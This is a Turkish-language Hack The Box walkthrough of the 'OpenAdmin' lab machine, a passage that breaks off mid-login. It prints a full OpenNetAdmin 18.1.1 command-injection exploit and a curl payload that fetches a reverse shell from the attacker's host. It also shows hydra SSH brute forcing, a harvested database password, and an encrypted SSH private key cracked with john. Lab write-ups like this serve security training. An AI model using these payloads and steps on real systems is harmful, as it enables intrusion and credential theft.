{"id":1375,"date":"2021-07-18T15:08:33","date_gmt":"2021-07-18T15:08:33","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1375"},"modified":"2022-06-09T14:49:16","modified_gmt":"2022-06-09T14:49:16","slug":"openadmin","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/18\/openadmin\/","title":{"rendered":"OpenAdmin"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
OpenAdmin<\/a> - HTB<\/td>\nKolay<\/td>\nLinux<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n

[*] Scan: 9\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-17 21:59 EDT\nNmap scan report for 10.10.10.171\nHost is up (0.25s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)\n|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)\n|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7\/17%OT=22%CT=1%CU=40349%PV=Y%DS=2%DC=T%G=Y%TM=60F38EB\nOS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ\nOS:(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O\nOS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=\nOS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN\nOS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D\nOS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O\nOS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W\nOS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R\nOS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 143\/tcp)\nHOP RTT       ADDRESS\n1   120.51 ms 10.10.16.1\n2   326.87 ms 10.10.10.171\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 960.96 seconds\n<\/code><\/pre>\n
Bunun \u00fczerine 80. port i\u00e7in nikto ve gobuster taramalar\u0131n\u0131 ba\u015flatt\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.171\/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirb\/big.txt --no-error | tee gobuster1\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.171\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              sql,bash,pcap,rar,conf,sh,php,txt,zip,7z,html,bak,php5,cap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/17 19:59:23 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.171\/.htaccess.sql        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.sql        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.bash       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.sh         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd\/           (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.php5       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.html       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.php        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.html       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.rar        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.php5       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.cap        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.cap        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.bak        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.rar        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.pcap       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.conf       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.php        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.bak        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.txt        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess\/           (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.zip        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.7z         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.7z         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.pcap       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.sh         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.txt        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.bash       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.zip        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.conf       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/artwork\/             (Status: 200) [Size: 14461]\nhttp:\/\/10.10.10.171\/icons\/               (Status: 403) [Size: 277]  \nhttp:\/\/10.10.10.171\/index.html           (Status: 200) [Size: 10918]\nhttp:\/\/10.10.10.171\/music\/               (Status: 200) [Size: 12554]\nhttp:\/\/10.10.10.171\/server-status\/       (Status: 403) [Size: 277]  \nhttp:\/\/10.10.10.171\/sierra\/              (Status: 200) [Size: 43029]<\/code><\/pre>\n
gobuster taramalar\u0131 esnas\u0131nda  http:\/\/10.10.10.171\/music\/<\/a> <\/strong> adresinde bir uygulama \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131 g\u00f6rd\u00fcm ve bu uygulaman\u0131n version bilgiside mevcuttu. Bununla alakal\u0131 exploit taramas\u0131 ger\u00e7ekle\u015ftirdim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# searchsploit opennetadmin          \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nOpenNetAdmin 13.03.01 - Remote Code Execution                                                                                                                                                               | php\/webapps\/26682.txt\nOpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                                                                                                | php\/webapps\/47772.rb\nOpenNetAdmin 18.1.1 - Remote Code Execution                                                                                                                                                                 | php\/webapps\/47691.sh\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# cp $(locate php\/webapps\/47691.sh) .\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# cat 47691.sh                       \n# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution\n# Date: 2019-11-19\n# Exploit Author: mattpascoe\n# Vendor Homepage: http:\/\/opennetadmin.com\/\n# Software Link: https:\/\/github.com\/opennetadmin\/ona\n# Version: v18.1.1\n# Tested on: Linux\n\n# Exploit Title: OpenNetAdmin v18.1.1 RCE\n# Date: 2019-11-19\n# Exploit Author: mattpascoe\n# Vendor Homepage: http:\/\/opennetadmin.com\/\n# Software Link: https:\/\/github.com\/opennetadmin\/ona\n# Version: v18.1.1\n# Tested on: Linux\n\n#!\/bin\/bash\n\nURL="${1}"\nwhile true;do\n echo -n "$ "; read cmd\n curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \\"BEGIN\\";${cmd};echo \\"END\\"&xajaxargs[]=ping" "${URL}" | sed -n -e '\/BEGIN\/,\/END\/ p' | tail -n +2 | head -n -1\ndone                                                                                                                                                                                                                                              \n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \\"BEGIN\\";whoami;echo \\"END\\"&xajaxargs[]=ping" http:\/\/10.10.10.171\/ona\/ | sed -n -e '\/BEGIN\/,\/END\/ p' | tail -n +2 | head -n -1\nwww-data\n<\/code><\/pre>\n
Harika! Bir RCE'miz var. Makinede \u00e7al\u0131\u015fmakta oldu\u011fum klas\u00f6rde yazma hakk\u0131m vard\u0131. Bunun \u00fczerine i\u00e7eriye bir reverse shell upload ettim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \\"BEGIN\\";wget http:\/\/10.10.16.56:1111\/reverse4kuday.php;echo \\"END\\"&xajaxargs[]=ping" http:\/\/10.10.10.171\/ona\/ | sed -n -e '\/BEGIN\/,\/END\/ p' | tail -n +2 | head -n -1\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \\"BEGIN\\";ls -al;echo \\"END\\"&xajaxargs[]=ping" http:\/\/10.10.10.171\/ona\/ | sed -n -e '\/BEGIN\/,\/END\/ p' | tail -n +2 | head -n -1 \ntotal 132\ndrwxrwxr-x 10 www-data www-data  4096 Jul 18 00:33 .\ndrwxr-x---  7 www-data www-data  4096 Nov 21  2019 ..\n-rw-rw-r--  1 www-data www-data  1970 Jan  3  2018 .htaccess.example\n-rw-r--r--  1 www-data www-data 12288 Jul 17 20:08 .reverse.php.swp\ndrwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 config\n-rw-rw-r--  1 www-data www-data  1949 Jan  3  2018 config_dnld.php\n-rw-rw-r--  1 www-data www-data  4160 Jan  3  2018 dcm.php\n-rwxr-xr-x  1 www-data www-data  5494 Jul 17 19:43 diohan.php\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 images\ndrwxrwxr-x  9 www-data www-data  4096 Jan  3  2018 include\n-rw-rw-r--  1 www-data www-data  1999 Jan  3  2018 index.php\n-rw-r--r--  1 www-data www-data     0 Jul 18 00:31 kuday\ndrwxrwxr-x  5 www-data www-data  4096 Jan  3  2018 local\n-rw-rw-r--  1 www-data www-data  4526 Jan  3  2018 login.php\n-rw-rw-r--  1 www-data www-data  1106 Jan  3  2018 logout.php\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 modules\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 plugins\n-rw-r--r--  1 www-data www-data  1111 Jul 17 08:46 reverse.php\n-rw-r--r--  1 www-data www-data  5493 Jul 18 00:19 reverse4kuday.php\n-rw-r--r--  1 www-data www-data  5495 Jul 17 20:02 rshell.php\n-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php\n-rw-r--r--  1 www-data www-data    73 Jul 17 19:40 shell.php.1\n-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php.2\n-rw-r--r--  1 www-data www-data  5493 Jul 17 18:18 supaShell.php\ndrwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 winc\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 workspace_plugins\n<\/code><\/pre>\n
Reverse shell'i taray\u0131c\u0131 \u00fczerinden tetikledi\u011fimde dinleme noktama shell d\u00fc\u015fm\u00fc\u015ft\u00fc.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# nc -lvp 1234         \nlistening on [any] 1234 ...\n10.10.10.171: inverse host lookup failed: Unknown host\nconnect to [10.10.16.56] from (UNKNOWN) [10.10.10.171] 43070\nLinux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU\/Linux\n 00:34:10 up 1 day,  3:10,  0 users,  load average: 3.43, 4.79, 3.99\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can't access tty; job control turned off\n$ ifconfig\nens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255\n        inet6 dead:beef::250:56ff:feb9:3463  prefixlen 64  scopeid 0x0<global>\n        inet6 fe80::250:56ff:feb9:3463  prefixlen 64  scopeid 0x20<link>\n        ether 00:50:56:b9:34:63  txqueuelen 1000  (Ethernet)\n        RX packets 2797350  bytes 376270029 (376.2 MB)\n        RX errors 0  dropped 863  overruns 0  frame 0\n        TX packets 2762041  bytes 949913630 (949.9 MB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10<host>\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 277881  bytes 20887608 (20.8 MB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 277881  bytes 20887608 (20.8 MB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0<\/code><\/pre>\n
\u0130\u00e7eride gezinirken db config dosyas\u0131 buldum.<\/p>\n
?>$ cat \/opt\/ona\/www\/local\/config\/database_settings.inc.php\n<?php\n\n$ona_contexts=array (\n  'DEFAULT' => \n  array (\n    'databases' => \n    array (\n      0 => \n      array (\n        'db_type' => 'mysqli',\n        'db_host' => 'localhost',\n        'db_login' => 'ona_sys',\n        'db_passwd' => 'n1nj4W4rri0R!',\n        'db_database' => 'ona_default',\n        'db_debug' => false,\n      ),\n    ),\n    'description' => 'Default data context',\n    'context_color' => '#D3DBFF',\n  ),\n);\n\n?>$ <\/code><\/pre>\n
hydra ile ssh bruteforce yapt\u0131\u011f\u0131m esnada sald\u0131r\u0131y\u0131 durdurdum ve kullan\u0131c\u0131larla burdaki parlay\u0131 denemesini sa\u011flad\u0131m. B\u00f6yle bir kullan\u0131c\u0131 tespit ettim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# hydra -L users -P passwords ssh:\/\/10.10.10.171\nHydra v9.1 (c) 2020 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-17 21:02:49\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:2\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/10.10.10.171:22\/\n[22][ssh] host: 10.10.10.171   login: jimmy   password: n1nj4W4rri0R!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-17 21:02:55\n<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# ssh jimmy@10.10.10.171                        \njimmy@10.10.10.171's password: \nWelcome to Ubuntu 18.04.3 LTS (GNU\/Linux 4.15.0-70-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sun Jul 18 01:13:37 UTC 2021\n\n  System load:  0.82              Processes:             244\n  Usage of \/:   53.4% of 7.81GB   Users logged in:       0\n  Memory usage: 49%               IP address for ens160: 10.10.10.171\n  Swap usage:   0%\n\n  => There are 6 zombie processes.\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. Activate at:\n     https:\/\/ubuntu.com\/livepatch\n\n41 packages can be updated.\n12 updates are security updates.\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Sat Jul 17 20:42:12 2021 from 10.10.14.131\njimmy@openadmin:~$ \n<\/code><\/pre>\n
\u0130\u00e7eride bilgi toplama a\u015famas\u0131ndayken ilgin\u00e7 bir \u015fey farkettim.<\/p>\n
---\n================================================================( network )=====\n[*] net000 Services listening only on localhost............................ yes!\n---\ntcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     \ntcp    LISTEN   0        128             127.0.0.1:52846          0.0.0.0:* <\/code><\/pre>\n
3306 mysql'di ancak 52846 ne oldu\u011fu hakk\u0131nda bir bilgim yoktu. Bunun bir web servisi oldu\u011funu anlad\u0131m ve www alt\u0131ndaki internal klas\u00f6r\u00fcndeki kodlar\u0131 deploy edebilece\u011fini d\u00fc\u015f\u00fcnd\u00fcm.<\/p>\n
jimmy@openadmin:\/var\/www\/internal$ ls\ntotal 20\ndrwxrwxrwx 2 jimmy internal 4096 Nov 23  2019 .\ndrwxr-xr-x 4 root  root     4096 Nov 22  2019 ..\n-rwxrwxrwx 1 jimmy internal 3229 Nov 22  2019 index.php\n-rwxrwxrwx 1 jimmy internal  185 Nov 23  2019 logout.php\n-rwxrwxrwx 1 jimmy internal  339 Nov 23  2019 main.php\njimmy@openadmin:\/var\/www\/internal$ cat main.php \n<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: \/index.php"); }; \n# Open Admin Trusted\n# OpenAdmin\n$output = shell_exec('cat \/home\/joanna\/.ssh\/id_rsa');\necho "<pre>$output<\/pre>";\n?>\n<html>\n<h3>Don't forget your "ninja" password<\/h3>\nClick here to logout <a href="logout.php" tite = "Logout">Session\n<\/html>\n<\/code><\/pre>\n
G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere main.php  joanna kullan\u0131c\u0131s\u0131n\u0131n ssh key'ini ekrana bas\u0131yor. Denedim ve ba\u015far\u0131l\u0131 oldum.<\/p>\n
jimmy@openadmin:\/var\/www\/internal$ curl http:\/\/127.0.0.1:52846\/main.php\n<pre>-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D\n\nkG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8\nad\/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO\nShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE\n6xaubNKhDJKs\/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ\nZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5\/Du\ny8byJ\/3I3\/EsqHphIHgD3UfvHy9naXc\/nLUup7s0+WAZ4AUx\/MJnJV2nN8o69JyI\n9z7V9E4q\/aKCh\/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4\npiC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv\/dEVEppvIDE\/8h\/\n\/U1cPvX9Aci0EUys3naB6pVW8i\/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH\n40ZNca5xHPij8hvUR2v5jGM\/8bvr\/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN\/AZ\nfnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb\n9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80\nX1VZ+N7S8ZP+7djB22vQ+\/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg\nS33lgrCM4\/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey\/ur\/4F\nFnonsEl16TZvolSt9RH\/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh\nTh5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD\/GtPmcviGCexa\nRTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z\nuhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA\/MxlYJ9FNDr\n1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2\nXGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM\/SLhS79\nyPzCZH8uWIrjaNaZmDSPC\/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM\n+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7\/ee6KDTl7JMdV25DM9a16JYOneRtMt\nqlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt\nz0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe\nK1I1cqiDbVE\/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw\/iMKhpITWLWApA3k9EN\n-----END RSA PRIVATE KEY-----\n<\/pre><html>\n<h3>Don't forget your "ninja" password<\/h3>\nClick here to logout <a href="logout.php" tite = "Logout">Session\n<\/html>\n<\/code><\/pre>\n
Ancak dosya \u015fifrelenmi\u015fti john ile h\u0131zl\u0131 bir \u015fekilde k\u0131rabildim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py id \nid:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py id > ssh2john\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# john ssh2john --wordlist=\/usr\/share\/wordlists\/rockyou.txt                                1 \u2a2f\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH [RSA\/DSA\/EC\/OPENSSH (SSH private keys) 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 0 for all loaded hashes\nCost 2 (iteration count) is 1 for all loaded hashes\nWill run 4 OpenMP threads\nNote: This format may emit false positives, so it will keep trying even after\nfinding a possible candidate.\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbloodninjas      (id)\nWarning: Only 2 candidates left, minimum 4 needed for performance.\n1g 0:00:00:04 DONE (2021-07-17 22:02) 0.2475g\/s 3549Kp\/s 3549Kc\/s 3549KC\/sa6_123..*7\u00a1Vamos!\nSession completed\n<\/code><\/pre>\n
Art\u0131k  ba\u011flant\u0131 kurabiliriz.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# ssh joanna@10.10.10.171 -i id                            \nEnter passphrase for key 'id': \nWelcome to Ubuntu 18.04.3 LTS (GNU\/Linux 4.15.0-70-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sun Jul 18 02:15:39 UTC 2021\n\n  System load:  1.35              Processes:             238\n  Usage of \/:   53.4% of 7.81GB   Users logged in:       1\n  Memory usage: 49%               IP address for ens160: 10.10.10.171\n  Swap usage:   0%\n\n  => There are 6 zombie processes.\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. Activate at:\n     https:\/\/ubuntu.com\/livepatch\n\n41 packages can be updated.\n12 updates are security updates.\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Sat 